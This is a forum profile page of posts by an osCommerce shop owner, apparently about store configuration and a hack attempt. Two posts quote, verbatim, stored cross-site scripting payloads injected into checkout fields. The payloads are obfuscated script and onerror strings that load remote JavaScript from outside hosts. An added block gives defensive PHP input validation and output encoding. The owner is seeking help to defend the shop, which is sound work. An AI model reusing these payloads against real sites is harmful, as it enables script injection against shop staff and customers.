
Everything posted by puggybelle

  1. puggybelle

    Hack attempt - is there a way to prevent this?

    Okay, here's where I'm at. Webhost scanned the database and found three similar patterns of jb.gy in the sessions table and removed them. No new files had been added to the website. And just encouragement to upgrade my installation to the 'frozen' version, I think it's called. And that's what I thought I had! Oh, well. Work to do but it didn't turn out to be a disaster. Think I will give View Counter another look, though... If I have to block half the world, I'll do it! Thanks everybody! - Andrea
  2. Someone put an item in their cart and went thru Purchase Without Account and filled out their address details like this (or I assume they entered this manually):

    Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC
    244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_
    Ithaca
    Ithaca, New York 98765
    United States

    I've changed the name and address for this post as the street address, city, state and zip code they provided is legit. They checked out using the Checks/Money Order method - no account was created or ever existed for this buyer's name. The order process email it generated bounced back to me as undeliverable:

    A message that you sent contained one or more recipient addresses that were incorrectly constructed:
    "Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC" <bobsmith987@hotmail.com>: unmatched doublequote in local part (expected word or "<")
    This address has been ignored. There were no other addresses in your message, and so no attempt at delivery was possible.

    Is there a way to prevent that? Stop someone from proceeding when adding garbage in the name and address fields? And...can someone tell me what it is they're trying to accomplish by doing this? Thanks! - Andrea
  3. puggybelle

    Hack attempt - is there a way to prevent this?

    They checked out using the checks/money order selection so no worries about payment or delivery. And I sincerely hope that this is a one-off thing and all will be well. I have contacted my webhost with full details and am awaiting a response now. Other orders have come thru fine, so I'm hopeful that deleting the order is the end of it. This crap is really scary, you know? Well, I'm sure the webhost knows more than I do about these things, so...I've put it all in their lap now. I haven't the faintest idea how to go about manually cleaning the database. Hopefully, they'll find nothing and I can forget about it. My host does NOT offer country blocking. I had View Counter installed for a brief time, back when I had SEO-G urls running, but there was some conflict and I ended up uninstalling View Counter. In retrospect, it should have been the other way around. I now use Ultimate SEO URLs. Live and learn, I guess. I'll post back with any response I get from the webhost. Hopefully, everything is okay. Thanks all! - Andrea
  4. puggybelle

    Hack attempt - is there a way to prevent this?

    @ArtcoInc Well, this is just a mess! My core code has been modified substantially, so...I have a lot to think about now. But, Thank You for helping!

    @Jack_mcs Upon viewing the order process email that bounced back after this hack attempt, I see a huge chunk of malicious code that was inserted in the text section of the order form. The part where buyers can add any additional comments with their purchase. But, the < > tags have been stripped. Looks like this:

    _/tExtArEa_'"__sCRiPt sRC=//jb.gy/i__/sCrIpT__img src=x onerror=s=createElement('script');body.appendChild(s);s.src='//jb.gy/i';_ _/tEXtArEa_'"__img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fjb.gy%2Fi%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//_'"__input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus_'"__img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbGQ4Lm1lL3VwZUMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))_

    It'd be nice if we could get a hacker up here to explain what the heck they're doing or what they're after with code like that. I bet someone in this forum knows... I will take comfort in knowing that the code is being sanitized and just leave it at that. This hacker nonsense is crazy and worse than ever. Thanks to everyone who posted - I appreciate it very much! - Andrea
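An added example (not part of the original posts and not osCommerce code) for the question asked in this thread and the stripped-tag text shown above: reject name and address values outside a narrow allowlist at checkout, and encode whatever is stored for each place it is printed, an HTML page or a mail `To:` header. The function names, the allowed character set, the 64-character limit and the `buyer@example.com` address are assumptions.

```php
<?php
// Added example, not osCommerce code; all function names are hypothetical.

// Input check for name/address fields: letters, combining marks, digits,
// spaces and a little punctuation. Quotes, "<", ">", "=", "_" and "/" fail.
// \A...\z (not ^...$) so a trailing newline cannot slip through.
function field_is_plausible(string $value, int $maxLen = 64): bool
{
    $pattern = '/\A[\p{L}\p{M}\p{N} .,\'#-]{1,' . $maxLen . '}\z/u';
    return preg_match($pattern, trim($value)) === 1;
}

// Output encoding for HTML pages (admin order view, invoices, HTML e-mail).
function html_text(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Output encoding for a "Name" <addr> mail header: CR/LF are replaced
// (header injection) and backslash and double quote are escaped, so the
// quoted display name stays balanced.
function mail_recipient(string $name, string $email): string
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('invalid e-mail address');
    }
    $name = preg_replace('/[\r\n]+/', ' ', $name);
    return '"' . addcslashes($name, "\"\\") . '" <' . $email . '>';
}

// Constructed samples; the second and third are the values quoted in the post.
$samples = [
    "Renée O'Brien-Smith",
    'Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC',
    '244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_',
    '12 Main St., Apt. #4',
];
foreach ($samples as $s) {
    $verdict = field_is_plausible($s) ? 'accept' : 'reject';
    printf("%-6s %s\n", $verdict, html_text($s));
}

// Even a value that got past validation cannot unbalance the header quoting.
echo mail_recipient($samples[1], 'buyer@example.com'), "\n";
```

The allowlist is deliberately strict, so a shop that must accept addresses containing `/` or other punctuation would widen the character class rather than drop the output encoding.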
  5. puggybelle

    Hack attempt - is there a way to prevent this?

    Is there anything I need to do? When I run Version Checker in Admin, it comes back with: - Andrea
  6. puggybelle

    Hack attempt - is there a way to prevent this?

    @ArtcoInc I downloaded a package that is dated May 24, 2018 called Responsive - osCommerce - master - Andrea
  7. puggybelle

    Hack attempt - is there a way to prevent this?

    I always forget to say which version I'm using. I'm using 2.3.4.1 CE with the latest version of PWA. - Andrea
  8. puggybelle

    Hack attempt - is there a way to prevent this?

    Can you be a little more specific? I deleted the order - no account existed. I found some interesting info online when searching a bit deeper. The name has been reported numerous times from other websites seeing injection code in the name and address fields, and some ending up on the receiving end of credit card fraud. Google the phrase Linda Juan Fraud and see what comes up. Guess it was just my turn! Hope they send cash... - Andrea
  9. Function keys section at the bottom of Includes > Modules > Content > Product_Info > cm_pi_date_available.php is missing an entry for Available Style in the Date Available module. 'MODULE_CONTENT_PI_DATE_AVAILABLE_STYLE',
  10. Stumbled on a file that appears to be missing a line of code.

    Catalog > Includes > Modules > Content > Product_Info > cm_pi_date_available.php

    Bottom of the file reads:

        function keys() {
          return array('MODULE_CONTENT_PI_DATE_AVAILABLE_STATUS', 'MODULE_CONTENT_PI_DATE_AVAILABLE_CONTENT_WIDTH', 'MODULE_CONTENT_PI_DATE_AVAILABLE_SORT_ORDER');
        }

    It's missing the entry for Available Style, which controls the appearance of the date format. Should look like this:

        function keys() {
          return array('MODULE_CONTENT_PI_DATE_AVAILABLE_STATUS', 'MODULE_CONTENT_PI_DATE_AVAILABLE_CONTENT_WIDTH', 'MODULE_CONTENT_PI_DATE_AVAILABLE_STYLE', 'MODULE_CONTENT_PI_DATE_AVAILABLE_SORT_ORDER');
        }

    I stumbled on it after trying to figure out how to change the date format that was being output on my products. I don't know who is responsible for maintaining the downloads of osCommerce, but I thought I should pass this on so it can be corrected. Makes life a little easier when setting up the module. - Andrea
  11. Hi Zahid, Should I just provide a link to the thread I created above or write a brand new post in that one? Looks like it's still active, last post dated November 29th. - Andrea
  12. I've searched for help with this and saw several people asking for help with it over the years, but no replies. At present, if I put an item on sale...only the sale price will appear in the New Products module on the homepage. I'd like it to appear as it does in the Specials box....original price, with a strike thru it, followed by the new sale price in red. Tried several things in includes/modules/products_new.php but nothing I do is working out. Can someone point me in the right direction, please? - Andrea
  13. Sorry...make that includes/modules/new_products.php - Andrea
  14. @Jack_mcs I'm sorry. This is what happens when posting late at night. I have a question about the Reset SEO URLs Cache feature. Is that something that should be done every so often or only when you have a problem? I remember installing this and some things were not working and when I did that, it cleared up all of my trouble immediately. Should I use that feature on a regular basis or let it sit? Thank You! - Andrea
  15. @Jack_mcs I don't believe there was a wonky character in the title. All of my titles are the same, in the way they're formatted. Just numbers and text. I'm going to hope that it was one of those crap moments I experienced with my webhost until they put me on a different server when I raised hell. My item descriptions that I migrated over from 2.2 were loaded with css code that was killing the extra description from appearing when browsing by category. I've been manually editing and stripping that code for a couple of months now, one item at a time in Admin. Got thru 100 or so today. It's ongoing. I'm clicking around fast and furious and I haven't run into it again, so...I just have to hope it was one of those abrupt disconnects in the past that may have somehow whacked that item. I'll never know and that blows. Hope I don't see anymore of it. Thanks for the explanation of the uninstall. I took that entry literally...like, UNINSTALL. WIPE IT OUT. And start over if you wish to have it. Oh, well. It's a great tool and I'm glad to have it! - Andrea
  16. @ArtcoInc No, nothing unusual. Looked like all my others. No funky characters or anything. I think you know my site...all of my titles are formatted the same. Date-name-keywords Like...11-4-18-Name-Of-Product-Keyword-Keyword-p-4545.html Something got corrupted, but I definitely didn't see anything wrong with the product in the database. And I stared at it more than a few times. I'm just glad I stumbled upon it. I clicked on the item just to retrieve the large photo (right click/save) for something else and that's when I discovered it wouldn't load. Otherwise, it would be sitting out there like that...Product Not Found!...for eternity. My fear is...are there more? With thousands of products there's no way I can just sit here and click thru them all to make sure they load. I had some issues with my webhost in recent months and I'm wondering if one of those sudden MySQL disconnects during editing may have done me in on that particular item. I just don't know. I have no memory of having problems with that item at any time. I have had the experience of suffering a disconnect during editing and watching an item disappear. Only the image remains. The description and title vanish. But, this one is really strange as it looked fine in both Admin and the database. Nothing missing. Nothing changed. And it wouldn't let me duplicate the product name after deleting the original. I think that's just bizarre. - Andrea
  17. @Jack_mcs Cache is set to false. I have no idea what may have happened. Item looks fine in the database. I deleted the item and created it anew...with the same product title, same everything...but generating a new product ID number on the end... And it STILL wouldn't load! Product Not Found! I deleted it again...changed the product title to something else...and now it loads. Very bizarre. Out of curiosity, what happens when you choose the Uninstall option in the SEO config page in Admin? Or I guess I should ask...what do you have to do afterward to get it back? I was too timid to try it. - Andrea
  18. 2.3.4.1 CE and PHP 7.0 I installed this contribution in late September and had no issues that I'm aware of until now. I've stumbled upon a product that has a valid SEO url when moused over, like... mysite.com/name-of-product-p-4245.html When I click on it, the URL in the browser loads as mysite.com/-p-0.html And I get D'oh. Product Not Found! The item looks fine in the database in both the Products and Products Description tables. It looks fine in the Admin side where I create and maintain items. The only thing I can think of is that the item was turned off from view when I put it up for auction, but it will not load after turning it back on. Any idea what could be happening? I've reset the SEO URLS cache hoping that might clear it up, but no luck. - Andrea
  19. Version 2.3.4.1 CE

    I am using the Bootstrap Container (as opposed to container-fluid) as I like the way it centers the website onscreen, rather than have it full screen. Trying to figure out why my footer is extending the full-width of the screen. Looks like this:

    So, aside from a color entry, I added a couple of lines in my user.css regarding height and margin, like this:

        .footer-extra {
          background-color: #2e4963;
          color: #ffffff;
          height: 60px;
          margin: 0px 46px 25px 46px;
        }

    Now my footer looks a whole lot better, lining up with the rest of the page, except for these annoying little gray lines (borders?) that are appearing outside the footer as my scribbled arrows indicate:

    I'm guessing it has something to do with the containers but, I don't know how to fix that or where to look. I'd like to clean that up. Thanks for any help! - Andrea
  20. Thank You @Tsimi I tried border: 0px and had no luck. This makes me think twice about abandoning my navigation bar...same problem. Thanks! You make everything so easy! - Andrea
  21. Hello! I am using 2.3.4.1 CE

    I would like to have the My Account link always appear at the end of the breadcrumb. I see some code at the bottom of includes/application_top.php where I have added the My Account link:

        $breadcrumb->add(HEADER_TITLE_TOP, HTTP_SERVER);
        $breadcrumb->add(HEADER_TITLE_CATALOG, tep_href_link('index.php'));
        $breadcrumb->add(HEADER_TITLE_MY_ACCOUNT, tep_href_link('account.php'));

    So my breadcrumb now looks like this:

    How do I get My Account to always appear on the other end circled in blue, where it doesn't interfere with the breadcrumb being generated when browsing? Thanks! - Andrea
  22. Forgot to thank someone. @JcMagpie Putting this in a module is a great idea. It looks super nice! Very clean and linear. Like it belongs there. Thank You! - Andrea
  23. @MrPhil and Malcolm (your username won't come up when trying to insert it...?) Both of your solutions work. Thank You so much! I understand your point. I guess I'm trying to figure out a way to address all users, without turning off those who don't want to create an account. I have Purchase Without Account installed, so the idea of having Log On or Log In seems to imply you need an account. Don't want that. At the same time, if the link changes from My Account to Log Off...that kills the logged in users' avenue to view their account. The goal here is to get rid of the navigation bar and/or the Buttons module which have links for My Account. Free up some space in my header. I suppose the ideal solution would be to have My Account...buyer clicks and logs in...and now the module shows My Account | Log Off links. Then they log off and we're back to displaying My Account only. Do you know how to accomplish that? I can play with HTML code, but this PHP code is...difficult. For me! - Andrea
  24. This is what I tried...

        <div class="col-sm-<?php echo $content_width; ?> cm-header-breadcrumb2">
          <ol class="breadcrumb" id=abc>
          if ( tep_session_is_registered('customer_id') ) {
          <li><a href="logoff.php">Log Off</a></li>
          } else {
          <li><a href="account.php">My Account</a></li></ol>}
        </div>

    And this is what I get...

    Now you know what I mean about code bleeding on the screen. ??? - Andrea
  25. Well, I'm happy to report that I did duplicate the module correctly the first time...yay!...just got stuck on how to edit the template file. I applied your code in the new template file and it works great! Just one issue I need to sort out. I'm trying to figure out how to apply a statement that controls what link appears in the module...either My Account or Log Off. I think having a Log Off link is necessary and, theoretically, that should replace the My Account link after a customer has logged in. When they log off, My Account should reappear. I've messed around with some 'else' statements but all of my code just bleeds onto the screen. I need something like: if ( tep_session_is_registered('customer_id') ) { then Log Off appears in the module, otherwise My Account appears instead You get the idea. At the moment, all I can come up with is both links in the module, like this: Which looks dumb if you're not logged in. Funny enough, the Log Off link works whether you're logged in or not, but...it's not good having them both there. Can you help me with that? Thank You! - Andrea